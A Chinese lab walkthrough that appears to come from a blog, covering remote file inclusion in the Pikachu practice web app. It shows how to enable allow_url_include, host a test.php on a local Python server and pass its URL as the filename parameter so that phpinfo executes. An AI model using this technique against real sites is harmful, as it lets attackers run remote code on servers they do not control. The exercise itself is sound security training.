Pikachu-File Inclusion-远程文件包含

 远程文件包含漏洞

        是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在,危害性会很大。但远程文件包含漏洞的利用条件较为苛刻;因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。

PHP的需要php.ini中配置

allow_url_fopen=On    // 默认情况下是打开的;
allow_url_include=On  // 默认情况下是关闭的;

开启配置

文件所在位置:

	/etc/php/7.3/apache2/php.ini

修改完成后,

重启容器, 

exit         #退出当前容器的/bin/bash
docker ps    #查找当前容器id
docker restart 4e4ccb0e81d2   #重启pikachu容器

再次访问,没有了告警;

首先,在D盘下构造一个 test.php 文件 ,

python 搭一个本地文件服务器

 再次请求远程文件包含, filename 的值改为http://192.168.3.218:8000:test.php   

可以看到,phpinfo 已经显示;

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值